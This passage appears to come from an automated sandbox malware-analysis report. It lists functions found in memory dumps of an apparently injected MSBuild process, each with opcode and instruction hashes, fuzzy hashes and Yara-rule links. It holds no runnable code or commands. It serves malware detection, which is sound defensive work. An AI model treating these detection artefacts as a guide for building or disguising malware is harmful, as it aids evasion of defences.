                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144132D Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 046a555ec77ec476ebe38b789848e747022f9b7454134664f8d8b2579b711935
                                                                                                                                                                                                                                                                  • Instruction ID: e4bc0cdd3710ca4dfc438e4e8843d2860425e90b708a52c0aa610b9649908904
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 046a555ec77ec476ebe38b789848e747022f9b7454134664f8d8b2579b711935
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B818F75A00205DFDB09CFA9C490AAEBBF1FF88300F1581AAD859EB355D734EA41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144903E Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8ed151684033eb9a17552e323de3ae55d0d694c82952cbb595dc26f7b51048b1
                                                                                                                                                                                                                                                                  • Instruction ID: 6675829504a7edc4af3b81cbacab9cf6eb50873f7bf2e7b58cdb5dcd117c5c4a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed151684033eb9a17552e323de3ae55d0d694c82952cbb595dc26f7b51048b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5461F4B1600616AFE715CF69C884BABBBA8FF98318F00461EF95887260DB30E501CBD1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144FCF2 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7e3bfcc1862f1e6c8ef8750098175a135e1edccb6786f1465a4d16b39be742ce
                                                                                                                                                                                                                                                                  • Instruction ID: 6c4f6c87a7406fa65e57f34b9833a875896cc46106bd5f95471dc0e6851aca26
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e3bfcc1862f1e6c8ef8750098175a135e1edccb6786f1465a4d16b39be742ce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC61C471A0020ADFEB14DF6CC981ABEB7F1FF48314F24452AE555EB2A1D730A91ACB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014492A6 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8dd37cc158fd370b7b1110c50d7415769a82a5fba7fc2db05ed72d4b7db59d3f
                                                                                                                                                                                                                                                                  • Instruction ID: 90a0ef8925bd0362a4b5bb51fc17dda3260de664f8b795b21434c655a9b72b2f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd37cc158fd370b7b1110c50d7415769a82a5fba7fc2db05ed72d4b7db59d3f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4661E7312087428BF715CF69C494B6BBBE0BF9971CF18446EE9858B3A1DB35D806D781
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144CE93 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                                                                                                                                                                                  • Instruction ID: 15a83cd029a66611301cd3d22901ab166718da2117a8bab607e15bae3e1c3b9d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 805149326066029BF715CE2D88E076BBBD6AFE0250F1D846FE955C73A2DB34D8068791
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00402D90 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                                                                                                                                  • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137B2D3 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 07beb8f776bead7da67ade3329718d85bd18133f549a07fa028bfaa61e8acfa1
                                                                                                                                                                                                                                                                  • Instruction ID: a9aca874af4ee0d9f14a01fceeb3230d76ea3a75b241dedf1a97b8df8144d086
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07beb8f776bead7da67ade3329718d85bd18133f549a07fa028bfaa61e8acfa1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C241F431600601AFDB369F2DD880B6ABBB9EF44768F11442AEA19DB265DB34DC41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BB570 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1d3691006fed97efb61e2dfd9ded64100032a39e0fda24e460517396e9dce966
                                                                                                                                                                                                                                                                  • Instruction ID: 23f43384f54e8aa609121a69b9d2bd862251ae4b5a915d0f6b3db2239f0d2956
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d3691006fed97efb61e2dfd9ded64100032a39e0fda24e460517396e9dce966
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8451C671204246AFE730FF68C885F6B7BA8EB55728F14062DFA11971A1DB30D801CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013FD5D0 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                                                                                                                                                  • Instruction ID: a710681bc1e3e1c396bd57f43493f3edc04592a7873e69090e4edfabcfc3eb1e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F65104762003479BCB11AFA88C48ABB7BE5EF9465CF54042DFB44CB251E735C859C7A2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A95DA Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1e9c3f78d1bd634832a4129fa9136342dc98ed326b19d1ba72af63178f71a8f9
                                                                                                                                                                                                                                                                  • Instruction ID: 029f452ca11297ffc3736daf8ee81b9a9145654fb8d6459fa07528a44dec3968
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e9c3f78d1bd634832a4129fa9136342dc98ed326b19d1ba72af63178f71a8f9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3519D70900319ABEF229FB9CC85BEDBBB8FF05358F60412AE594A71A1DB719854DF10
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01447D73 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5c1401d1868d86d00990d2fd69a7a373f4553d799086ba69a45c61b9502dba40
                                                                                                                                                                                                                                                                  • Instruction ID: 2a8300e089cbd82612a1b86aae82b0dbd05571f5a84b100299cd8fb5b52ecd85
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c1401d1868d86d00990d2fd69a7a373f4553d799086ba69a45c61b9502dba40
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E251C136A1014A8BDB08CF6CC480AAEB7F1EF98310B19827AD815DB355E730DA16CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01387152 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: eae184f236d6663f166d0e830c824ba3acdc63904638de59ccf7ccb8fa0dfae2
                                                                                                                                                                                                                                                                  • Instruction ID: 4fe1ff50778dfd587f6ec312ec25a05f243f9d056c02a69830c0d3310aabb332
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eae184f236d6663f166d0e830c824ba3acdc63904638de59ccf7ccb8fa0dfae2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8511831A0471AEFEB15EF68C848BBDBBF6FF54719F204069D51293A90DB709901CB80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BE443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 867c60e674058cd01d284342b43c6619f92e8bf8f17947e4221ae57e5c7abd94
                                                                                                                                                                                                                                                                  • Instruction ID: e246f352bda1647ffd6a837dec3bb5f8526143d530193a4b93abbb5cc345cb7f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867c60e674058cd01d284342b43c6619f92e8bf8f17947e4221ae57e5c7abd94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7512A71200A49DFDB22EF6DC9C0FAAB3B9FF14748F41046AE65697A60E734E944CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A45B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                                                                  • Instruction ID: ce2bc78cb6343bc8ce499f0b5dd3612341df8644af883e00600a0df2a7d1f0d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A51DC35E0021AABDF16DF98C440BEEBBB9EF45358F48406AEA10BB240D775DD40CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01403A6C Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9aed6f037a15e4d75bdc7b5d8d061bb0e6c97841380c2e310e2e809d5833f3bd
                                                                                                                                                                                                                                                                  • Instruction ID: ec345994fc71d231126e2a90cdbfce9805ee2279d6e1a8e7c77548c83e04f2fd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9aed6f037a15e4d75bdc7b5d8d061bb0e6c97841380c2e310e2e809d5833f3bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02518B32E4051D4BEF25CE68D461BEFB7F2EB44324F440826E905BF3D1C6766946D650
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013FD800 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1575aaff218bcaed33d8da6f9fcd8a5e3e97b15b609816821912703dd4720616
                                                                                                                                                                                                                                                                  • Instruction ID: 6e8ab10bd2179bb27e8a137e865a023ec7bc8bde2366a39298c27e559c33ab33
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1575aaff218bcaed33d8da6f9fcd8a5e3e97b15b609816821912703dd4720616
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C51DF74A00216ABDB14DFECC488ABEBBB5FF45708F04416DEA45DB790E7349950CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144D26B Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                                                                                                                                                                  • Instruction ID: e0bf28abec2c1f3d0a93ab7a535c1e0153c1796ec168c49176f21e9b9898aa32
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37517D71A083429FE311CF68C884B5BBBE5FBE8254F04892EF99497391D734E905CB52
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01447571 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8e83632dc7b4ad1fec0831177fb78c75dcebabf39e1326dd4e731ce43d9c4315
                                                                                                                                                                                                                                                                  • Instruction ID: f7873c031bc1bb5320e3d10cab8192f8deb0981edbe642d2448926378515cd73
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e83632dc7b4ad1fec0831177fb78c75dcebabf39e1326dd4e731ce43d9c4315
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B551F731A0011A9BEB25DF6DD844A7FBBB6FF48356F14452AD905E7260DB70AD12CBC0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013851ED Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: dcbc2533f8e4398a68e5dfc6848398bc712a02f92279693c3353f6799f6016e3
                                                                                                                                                                                                                                                                  • Instruction ID: d1e31ba50dbc3f01f7508c5b1b9ab3f175cb039f4ed8526a5b52cbd561509c37
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcbc2533f8e4398a68e5dfc6848398bc712a02f92279693c3353f6799f6016e3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37518B71B01719DFEF22ABACC840BEDB7B5BB5831CF150019E945A7292DBB4A9408B51
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01405BF0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b90c9579018e507f66cc97c06df8a39a02b94efd9a9bdb412609f6b4d943e398
                                                                                                                                                                                                                                                                  • Instruction ID: 1c674241d7aca5f133b7ca4bf4de0c7f3b374c5b3905019eaee76ee9e66e6767
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b90c9579018e507f66cc97c06df8a39a02b94efd9a9bdb412609f6b4d943e398
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B412831B557069BCB27FBBF88025AEB6A1DF24614B11413FE802EF3B4DA7488014F91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014535D7 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                                                                                                                                                  • Instruction ID: 3be7ea7c79ba94d1b1b43304d06fa9c45aed5f8b45ae953b86e856b22946b49d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28517271600606EFDB56CF18C580A96FBB5FF45348F15C1AAE9089F322E371E945CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B01F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
